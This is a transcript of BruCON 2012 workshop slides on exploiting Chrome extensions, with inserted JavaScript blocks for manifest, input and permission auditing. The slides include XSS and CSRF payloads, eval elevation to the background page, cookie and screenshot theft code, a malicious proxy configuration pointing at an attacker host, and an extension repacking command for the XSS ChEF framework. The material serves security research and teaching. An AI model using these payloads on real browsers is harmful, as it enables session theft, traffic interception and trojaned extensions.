Advanced Chrome Extension Exploitation
DESCRIPTION
Slides from the BruCON 2012 workshops "Advanced Chrome Extension Exploitation" by Kyle Osborn and Krzysztof Kotowicz
TRANSCRIPT
![Page 1: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/1.jpg)
Advanced Chrome Extension Exploitation
Kyle 'Kos' Osborn, Krzysztof Kotowicz
![Page 2: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/2.jpg)
Introduction
• Krzysztof Kotowicz
  – IT security consultant at SecuRing
  – http://blog.kotowicz.net
  – @kkotowicz
• Kyle Osborn
  – Pentester at AppSec Consulting
  – http://kyleosborn.com/
  – @theKos
![Page 3: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/3.jpg)
Previous research
• Kyle Osborn, Matt Johansen
  – Hacking Google ChromeOS (BH 2011)
• N. Carlini, A. Porter Felt, D. Wagner (UC Berkeley)
  – An Evaluation of the Google Chrome Extension Security Architecture
  – http://www.eecs.berkeley.edu/~afelt/extensionvulnerabilities.pdf
• Krzysztof Kotowicz
  – http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
![Page 4: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/4.jpg)
Plan
• Briefing
  – Chrome extensions security 101
  – Abusing Chrome extensions
  – Easy exploitation
  – Using XSS ChEF
• Workshops
  – all of the above in practice & more
  – http://kotowicz.net/brucon/
![Page 5: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/5.jpg)
CHROME EXTENSIONS SECURITY
![Page 6: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/6.jpg)
Chrome extensions security
• Extensions are HTML5 applications packaged in signed .crx files
• chrome-extension://<id> URLs
• Have access to powerful APIs
  – chrome.tabs
  – chrome.history
  – chrome.cookies
  – chrome.proxy
  – bundled plugins (NPAPI)
• Permissions defined in manifest.json
![Page 7: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/7.jpg)
Chrome extensions security
• Extensions have a lot of power to abuse
• How bad can it be? Think...
  – global XSS
  – identity theft (bookmarks, history, cookies)
  – filesystem access
  – remote code execution (meterpreter)
![Page 8: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/8.jpg)
Chrome extensions security
Content script
• Can interact with the webpage DOM
  – e.g. execute JavaScript
  – isolated worlds for page JS / content script JS
• No access to chrome.* API
![Page 9: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/9.jpg)
Chrome extensions security
View pages
• Have access to chrome.* API
• No access to webpage DOM
• Content scripts and view pages can only exchange messages
• Examples:
  – option pages
  – new tabs
  – popups
![Page 10: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/10.jpg)
Chrome extensions security
Background page
• View page that runs constantly
• Has access to chrome.* API
• The Ultimate Target
![Page 11: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/11.jpg)
Chrome extensions security
• Currently, Chrome extension security is very reliant on the developer
  – Writing bad code is easy
  – Giving extensions more permissions than necessary is easier
• Extensions suffer from common web vulnerabilities
![Page 12: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/12.jpg)
Chrome extensions security
• XSS: page DOM has a vector that is grabbed and executed by the extension
• CSRF: page directly requests extension URLs
<iframe src="chrome-extension://<id>/pages/subscribe.html?location=//evil/whitelist"></iframe>
<link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='alert(1)'>" href="/rss.rss">
![Page 13: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/13.jpg)
Chrome extensions security
• NPAPI plugin vulns
  – Extensions can use NPAPI plugins (.dll, .so etc.)
  – Those run outside of Chrome sandboxes
  – Full permissions of the current OS user
  – Possible vulns: RCE, buffer overflows, path disclosures, command injections, ...
• Manual review by Google if a plugin is used
![Page 14: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/14.jpg)
Chrome extensions security
• Content-Security-Policy prevents XSS
• Chrome supports CSP in webpages (X-Content-Security-Policy, X-WebKit-CSP headers)
• Chrome supports CSP in extensions (content_security_policy in manifest)
• But...
![Page 15: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/15.jpg)
Extensions vs CSP in webpage
• Total CSP bypass
  – You can inject any code via extension
  – Injected code:
    • is same origin with the page (document.cookie etc.)
    • can communicate with view pages (chrome.extension.sendMessage)
chrome.tabs.executeScript(null, {code: "alert(1)"})
![Page 16: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/16.jpg)
Extensions vs CSP in manifest
• Cannot execute arbitrary code
• Even CSP in extension + CSP in webpage does not make you 100% safe!
  – You can pivot the attack through the webpage
  – You need additional vulnerabilities to exploit this
![Page 17: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/17.jpg)
Chrome extensions security
• Most commonly vulnerable
  – RSS readers
  – Note extensions
  – Web Developer extensions
![Page 18: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/18.jpg)
Chrome extensions security
manifest.json
• Defines resources, permissions, name etc.
• v1
  – insecure, but everyone uses it
• v2
  – Secure Content-Security-Policy by default (no XSS!)
  – Pages cannot access extension URLs (no CSRF!)
  – Unpopular
    • 26 out of top 1000 extensions
  – Will be enforced in Q3 2013
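As an added example (not code from the slides), a small manifest checker for the properties this slide argues for: manifest_version 2, a content_security_policy that allows neither 'unsafe-eval'/'unsafe-inline' nor remotely hosted script, and no extension pages listed in web_accessible_resources (in v2 that list is the only way a web page can load a chrome-extension:// URL, so it also decides whether the CSRF and fingerprinting vectors in this deck apply). The three manifests are constructed samples; the default v2 policy string is Chrome's documented default. Runs under Node.js:

```javascript
// Added example, not from the slides. Checks a manifest object for the
// manifest_version 2 / CSP / web_accessible_resources properties.
// Chrome's default policy for manifest_version 2 extension pages.
const DEFAULT_V2_CSP = "script-src 'self'; object-src 'self'";

// Constructed v1-style manifest: no manifest-level CSP, so inline script
// and eval() run inside extension pages, and any web page can load
// chrome-extension://<id>/... resources.
const INSECURE_MANIFEST = {
  manifest_version: 1,
  name: 'Feed reader (constructed sample)',
  version: '0.1',
  background_page: 'background.html',
};

// Constructed v2 manifest that opted back into eval, remote script and an
// exposed page: the version bump alone buys nothing here.
const WEAK_V2_MANIFEST = {
  manifest_version: 2,
  name: 'Feed reader (constructed sample)',
  version: '0.2',
  background: { page: 'background.html' },
  content_security_policy: "script-src 'self' 'unsafe-eval' https://cdn.example; object-src 'self'",
  web_accessible_resources: ['pages/subscribe.html'],
};

// Constructed v2 manifest with the default CSP and nothing exposed.
const HARDENED_MANIFEST = {
  manifest_version: 2,
  name: 'Feed reader (constructed sample)',
  version: '0.2',
  background: { scripts: ['background.js'] },
  content_security_policy: DEFAULT_V2_CSP,
  web_accessible_resources: [],
};

// Parse "directive src src; directive src" into {directive: [src, ...]}.
function parseCsp(csp) {
  const directives = {};
  for (const part of (csp || '').split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0]] = tokens.slice(1);
  }
  return directives;
}

// Returns a list of findings; an empty list means the manifest passes.
function auditManifest(m) {
  const findings = [];
  if (m.manifest_version !== 2) {
    findings.push('manifest_version is not 2: no default CSP, and any web page can load chrome-extension://<id>/ URLs');
  }
  // In v2 an absent content_security_policy means the secure default applies.
  const csp = parseCsp(m.content_security_policy || (m.manifest_version === 2 ? DEFAULT_V2_CSP : ''));
  const scriptSrc = csp['script-src'] || csp['default-src'] || [];
  if (scriptSrc.length === 0) {
    findings.push('no script-src policy: inline script and eval() are allowed in extension pages');
  }
  for (const src of scriptSrc) {
    if (src === "'unsafe-eval'" || src === "'unsafe-inline'") {
      findings.push(`script-src allows ${src}`);
    } else if (src === '*' || src === 'https:' || /^https?:\/\//.test(src)) {
      findings.push(`script-src loads remote code from ${src}`);
    }
  }
  const exposed = m.web_accessible_resources || [];
  if (exposed.some(p => /\.html?$/i.test(p) || p.includes('*'))) {
    findings.push('web_accessible_resources exposes extension pages to web content');
  }
  return findings;
}
```

auditManifest(INSECURE_MANIFEST) reports the version and the missing policy, auditManifest(WEAK_V2_MANIFEST) reports the eval allowance, the remote script host and the exposed page, and auditManifest(HARDENED_MANIFEST) returns an empty list.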
![Page 19: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/19.jpg)
Chrome extensions security
Installation methods
• Chrome Web Store
  – curated by Google
• .crx install from any website (prompts user)
  – Chrome 21 makes off-store installs harder
    • Drag & drop .crx to chrome://extensions
    • Or use the --enable-easy-off-store-extension-install flag
• MiTM not possible due to certificate signing
![Page 20: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/20.jpg)
ABUSING CHROME EXTENSIONS
![Page 21: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/21.jpg)
Fingerprinting
• The simplest method
  – Generate a list of known extension IDs, and bruteforce chrome-extension://ID/ resources to discover installed extensions
  – use onerror/onload to check for existence
    • http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
![Page 22: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/22.jpg)
CSRF - example
• Chrome Adblock 2.5.22
  – Extension UI uses pages/subscribe.html
  – pages/subscribe.html?location=url will subscribe to a new block list
• Can be called by any webpage
<iframe src="chrome-extension://<id>/pages/subscribe.html?location=//evil/whitelist">
var queryparts = parseUri.parseSearch(document.location.search);
BGcall("subscribe", {id: 'url:' + queryparts.location});
![Page 23: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/23.jpg)
XSS - example
• Slick RSS + Slick RSS: Feed Finder
  – simple injection location (<link> tag title)
<link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='payload'>" href="/rss.rss">
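Hardened counterparts to the two vulnerable patterns on the CSRF and XSS example slides (the subscribe.html?location= parameter and the <link> title), written as an added example that is not code from the slides, from Adblock or from Slick RSS; the function names, the confirm/subscribe hooks and the sample URLs are assumptions for illustration. Runs under Node.js:

```javascript
// Added example, not from the slides. Hardened handling of a URL taken from
// the query string and of a feed title taken from an untrusted page.

// --- The subscribe.html?location=... pattern (CSRF) ----------------------
// The vulnerable page acted on whatever document.location.search carried.
// Here the parameter must parse as an absolute http(s) URL, and nothing
// happens until the user confirms inside the extension page itself.
function parseSubscribeLocation(search) {
  const raw = new URLSearchParams(search).get('location');
  if (!raw) return null;
  let url;
  try {
    url = new URL(raw);            // no base URL: "//evil/whitelist" throws here
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

// confirmFn stands in for window.confirm; subscribeFn for the
// BGcall("subscribe", ...) step. Both are assumed names.
function subscribeFromQuery(search, confirmFn, subscribeFn) {
  const target = parseSubscribeLocation(search);
  if (target === null) return { status: 'rejected' };
  if (!confirmFn(`Subscribe to filter list ${target}?`)) return { status: 'cancelled' };
  subscribeFn({ id: 'url:' + target });
  return { status: 'subscribed', url: target };
}

// --- The <link rel="alternate" title="..."> pattern (XSS) ----------------
// The vulnerable extension dropped the page-supplied title into its own
// page as markup. Treat it as text: escape it (in real DOM code, assign it
// through textContent / createTextNode instead) and accept only http(s)
// hrefs, resolved against the page they were found on.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function safeHref(href, pageUrl) {
  try {
    const url = new URL(href, pageUrl);   // resolves relative feed paths like /rss.rss
    return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : '#';
  } catch (e) {
    return '#';
  }
}

// feed = {title, href} read from a <link> tag of an untrusted page.
function renderFeedEntry(feed, pageUrl) {
  return `<li><a href="${escapeHtml(safeHref(feed.href, pageUrl))}">${escapeHtml(feed.title)}</a></li>`;
}
```

With the slide's own inputs, parseSubscribeLocation('?location=//evil/whitelist') returns null, and renderFeedEntry({title: "hello <img src=x onerror='payload'>", href: '/rss.rss'}, 'https://news.example/') produces a list item whose text is the literal title rather than an image element.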
![Page 24: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/24.jpg)
Leveraging XSS
• Vector in page => XSS in content script
  – No access to chrome.* API
  – Only chrome.extension.*
    • e.g. chrome.extension.connect & chrome.extension.sendMessage to communicate
  – Need to elevate to view script
    • From view script:
chrome.extension.getBackgroundPage().eval("mwahahahahaaaaa!")
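The content script / view page / background page split (Content script, View pages and Background page slides) and the elevation step on this slide both come down to what the privileged side does with messages it receives. As an added example that is not code from the slides, here is the background-page side of that channel written so that a compromised content script gets no elevation: a fixed table of actions with typed arguments, and no path from a message to eval() or chrome.tabs.executeScript. Message shape, action names and the ctx object are assumptions; chrome.runtime.onMessage is the current name of the chrome.extension.sendMessage/onMessage pair the slides use. Runs under Node.js, where the chrome wiring is simply skipped:

```javascript
// Added example, not from the slides. Background-page message dispatcher
// that validates sender and arguments and never executes message content.
const MAX_NOTE_LENGTH = 4096;

// Each handler receives the already-checked message and a context holding
// the privileged state; it returns a plain response object.
const HANDLERS = {
  getSettings(msg, ctx) {
    return { settings: ctx.settings };
  },
  saveNote(msg, ctx) {
    if (typeof msg.key !== 'string' || typeof msg.text !== 'string' ||
        msg.key.length === 0 || msg.text.length > MAX_NOTE_LENGTH) {
      throw new Error('invalid saveNote arguments');
    }
    ctx.notes.set(msg.key, msg.text);
    return { saved: msg.key };
  },
};

function handleMessage(msg, sender, ctx) {
  // Only messages from this extension's own content scripts are accepted
  // (sender.id is the extension ID for those).
  if (!sender || sender.id !== ctx.selfId) return { error: 'unknown sender' };
  // Dispatch only on own properties of the table: "eval", "toString" or
  // "__proto__" as an action name all end up here as unknown.
  if (!msg || typeof msg.action !== 'string' ||
      !Object.prototype.hasOwnProperty.call(HANDLERS, msg.action)) {
    return { error: 'unknown action' };
  }
  try {
    return HANDLERS[msg.action](msg, ctx);
  } catch (e) {
    return { error: e.message };
  }
}

// Constructed state standing in for what a real background page holds.
function makeContext() {
  return { selfId: 'extension-id-placeholder', settings: { theme: 'dark' }, notes: new Map() };
}

// In a real background page this is the only wiring needed; in Node.js
// there is no chrome object and the block is skipped.
if (typeof chrome !== 'undefined' && chrome.runtime && chrome.runtime.onMessage) {
  const ctx = makeContext();
  chrome.runtime.onMessage.addListener((msg, sender, sendResponse) => {
    sendResponse(handleMessage(msg, sender, ctx));
  });
}
```

The message the slide's elevation step would send, a string meant for getBackgroundPage().eval(), is just an unknown action here and is answered with an error rather than executed.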
![Page 25: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/25.jpg)
XSS - example
![Page 26: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/26.jpg)
NPAPI vulns - example
• CR-GPG 0.7.8 (gpg-gmail bridge)
• GPG in gmail???
![Page 27: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/27.jpg)
NPAPI vulns - example
• Uses external gpg install through NPAPI plugin
• Long story short:
  – Easy to get from this:
![Page 28: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/28.jpg)
NPAPI vulns - example
• To this:
![Page 29: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/29.jpg)
NPAPI vulns - example
• To this:
![Page 30: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/30.jpg)
NPAPI vulns - example
• To this:
![Page 31: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/31.jpg)
EASY EXPLOITATION
![Page 32: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/32.jpg)
Easy exploitation
• alert(1) - Now what?
• Use an automated tool to pillage and plunder
• BeEF does a great job hooking into DOMs
• But
  – Need a special tool designed to take advantage of Chrome extension APIs
![Page 33: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/33.jpg)
Easy exploitation
• Enter XSS ChEF (Chrome Extension Exploitation Framework)
  – Designed from the ground up for exploiting extensions
  – Fast (uses WebSockets)
  – Preloaded with automated attack scripts
![Page 34: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/34.jpg)
Easy exploitation
• Monitor open tabs of victims
• Execute JS on every tab
• Extract HTML
• Read/write cookies
• Access localStorage
• Manipulate browser history
• Take screenshots of tabs
• Inject BeEF hooks / keyloggers
![Page 35: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/35.jpg)
USING XSS CHEF
![Page 36: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/36.jpg)
XSS ChEF
Launching server
$ php -v
PHP 5.3.12 (cli) (built: Jun 7 2012 22:49:42)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
    with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans
$ php server.php 2>command.log
XSS ChEF server
by Krzysztof Kotowicz - kkotowicz at gmail dot com
Usage: php server.php [port=8080] [host=127.0.0.1]
Communication is logged to stderr, use php server.php [port] 2>log.txt
2012-07-22 12:40:06 [info] Server created
2012-07-22 12:40:06 ChEF server is listening on 127.0.0.1:8080
2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Connected
2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Performing handshake
2012-07-22 12:40:06 [info] [client 127.0.0.1:60431] Handshake sent
2012-07-22 12:40:06 New hook c3590977550 from 127.0.0.1...
![Page 37: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/37.jpg)
XSS ChEF
Console
![Page 38: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/38.jpg)
XSS ChEF
Hook code
![Page 39: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/39.jpg)
XSS ChEF
![Page 40: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/40.jpg)
XSS ChEF
![Page 41: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/41.jpg)
XSS ChEF
![Page 42: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/42.jpg)
API abuse
• chrome.tabs.query - gets access to all tab URLs (even incognito!), titles, documents etc.
chrome.tabs.query({}, function(t) { log({type: 'report_tabs', 'result': t}); });
![Page 43: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/43.jpg)
API abuse
• chrome.tabs.executeScript - global XSS on any tab
• bypasses CSP
chrome.tabs.executeScript(null, {code: "alert(document.cookie)"});
![Page 44: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/44.jpg)
API abuse
• chrome.tabs.captureVisibleTab
chrome.tabs.captureVisibleTab(null, null, function(data_url) { log({type: 'recvscreenshot', url: data_url}); });
![Page 45: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/45.jpg)
API abuse
• chrome.cookies
  – read/write cookies, even httpOnly
chrome.cookies.getAll({url: "https://www.google.com/"}, cb);
{"domain": ".google.com", "expirationDate": 1358717774.49, "hostOnly": false, "httpOnly": true, "name": "NID", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "61=...."}, ...
chrome.cookies.set({url: 'https://www.google.com/', name: 'test-chef', value: 'test-ok', secure: true, httpOnly: true, expirationDate: null, path: '/'}, cb);
![Page 46: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/46.jpg)
API abuse
• chrome.proxy - silently change HTTP proxy!
var evilProxy = {
  "mode": "fixed_servers",
  "rules": {
    "bypassList": ["<local>", "ATTACKER_DOMAIN.COM"], // EXCLUDE BACK CHANNEL FROM PROXY
    "singleProxy": {
      "host": "localhost", // ATTACKER PROXY IP
      "port": 8080,        // ATTACKER PROXY PORT
      "scheme": "http"     // ATTACKER PROXY SCHEME
    }
  }
};
chrome.proxy.settings.set({value: evilProxy, scope: 'regular'}, cb);
![Page 47: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/47.jpg)
API abuse
• chrome.bookmarks - interact with bookmarks
chrome.bookmarks.search("http", cb);
{"dateAdded": 1342946320, "id": "123", "index": 0, "parentId": "21", "title": "GMail", "url": "https://mail.google.com/"}
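Every API on the preceding "API abuse" slides is gated by a permission in manifest.json, so the defender's counterpart to these slides is a least-privilege review of that list. As an added example that is not code from the slides, the check below flags the permissions and host patterns that unlock chrome.tabs, chrome.cookies, chrome.proxy, chrome.bookmarks, chrome.history and chrome.tabs.executeScript, plus the "plugins" key that brings in NPAPI code. The two manifests are constructed samples; the permission strings and the plugins key are real manifest fields, the risk wording is mine. Runs under Node.js:

```javascript
// Added example, not from the slides. Reports manifest permissions that
// grant the capabilities abused in the slides.
const RISKY_PERMISSIONS = {
  tabs: 'URLs and titles of every tab, incognito included (chrome.tabs.query), and tab screenshots (chrome.tabs.captureVisibleTab)',
  cookies: 'read and write cookies, httpOnly included, for every host pattern also granted (chrome.cookies)',
  proxy: 'silently reroute all browser traffic through another proxy (chrome.proxy.settings.set)',
  bookmarks: 'read and modify bookmarks (chrome.bookmarks)',
  history: 'read and modify browsing history (chrome.history)',
};

// Host patterns that match every site let chrome.tabs.executeScript run
// code in any tab, bypassing the page's own CSP.
function isBroadHostPattern(p) {
  return p === '<all_urls>' || /^(\*|https?):\/\/\*\/\*$/.test(p);
}

// Returns [{item, risk}] in manifest order; empty means nothing flagged.
function auditPermissions(manifest) {
  const findings = [];
  for (const p of manifest.permissions || []) {
    if (Object.prototype.hasOwnProperty.call(RISKY_PERMISSIONS, p)) {
      findings.push({ item: p, risk: RISKY_PERMISSIONS[p] });
    } else if (isBroadHostPattern(p)) {
      findings.push({ item: p, risk: 'script injection into every page (chrome.tabs.executeScript), bypassing page CSP' });
    }
  }
  if ((manifest.plugins || []).length > 0) {
    findings.push({ item: 'plugins', risk: "NPAPI plugin code runs outside the Chrome sandbox with the OS user's full permissions" });
  }
  return findings;
}

// Constructed sample: a feed reader asking for far more than it needs.
const OVERPRIVILEGED = {
  manifest_version: 2,
  name: 'Feed reader (constructed sample)',
  version: '1.0',
  permissions: ['tabs', 'cookies', 'proxy', 'storage', '<all_urls>', 'https://*.feeds.example/*'],
  plugins: [{ path: 'helper-plugin-placeholder.dll' }],   // placeholder file name
};

// The same extension scoped to what a feed reader actually uses.
const MINIMAL = {
  manifest_version: 2,
  name: 'Feed reader (constructed sample)',
  version: '1.0',
  permissions: ['storage', 'https://*.feeds.example/*'],
};

// One line per finding, suitable for a review log.
function report(manifest) {
  return auditPermissions(manifest).map(f => `${f.item}: ${f.risk}`);
}
```

report(OVERPRIVILEGED) lists tabs, cookies, proxy, <all_urls> and plugins; 'storage' and the single feed host pattern are not flagged, and report(MINIMAL) is empty.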
![Page 48: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/48.jpg)
Pre-Workshop Info
• Requirements
  – Latest version of XSS ChEF required (w/ dependencies)
    • PHP 5.3 + HTTP server, optionally node.js
    • unzip, curl
    • Only heavily tested under OS X & Linux
  – Chrome
  – Selected extensions
• All links can be found on http://kotowicz.net/brucon
![Page 49: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/49.jpg)
BREAK (THEN WORKSHOP)
http://kotowicz.net/brucon
![Page 50: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/50.jpg)
Workshop
• Part one: Exploitation
  – Discovery
  – Automation
• Part two: Repacking
  – Leveraging the human factor
![Page 51: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/51.jpg)
Part one: Exploitation
• Slick RSS
• Slick RSS: Feed Finder
![Page 52: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/52.jpg)
Part one: Exploitation
• Web Developer
![Page 53: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/53.jpg)
Part one: Exploitation
• Springpad Extension
![Page 54: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/54.jpg)
Part one: Exploitation
• Cookie Manager
![Page 55: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/55.jpg)
Part one: Exploitation
• cr-gpg
![Page 56: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/56.jpg)
Part Two: Repacking
• Wanted to get MORE privileges
• Utilizes "click-through syndrome"
• You can repack any other benign extension, adding a malicious part (e.g. XSS ChEF hook)
![Page 57: Advanced Chrome extension exploitation](https://reader031.vdocuments.net/reader031/viewer/2022020105/54b6d3874a79594d158b45e3/html5/thumbnails/57.jpg)
Part Two: Repacking
$ ./repacker-webstore.sh <ID> output.crx
Unpacking ...
Injecting xsschef...
Adding permissions...
Saving...
Done.
Moving signed extension to output.crx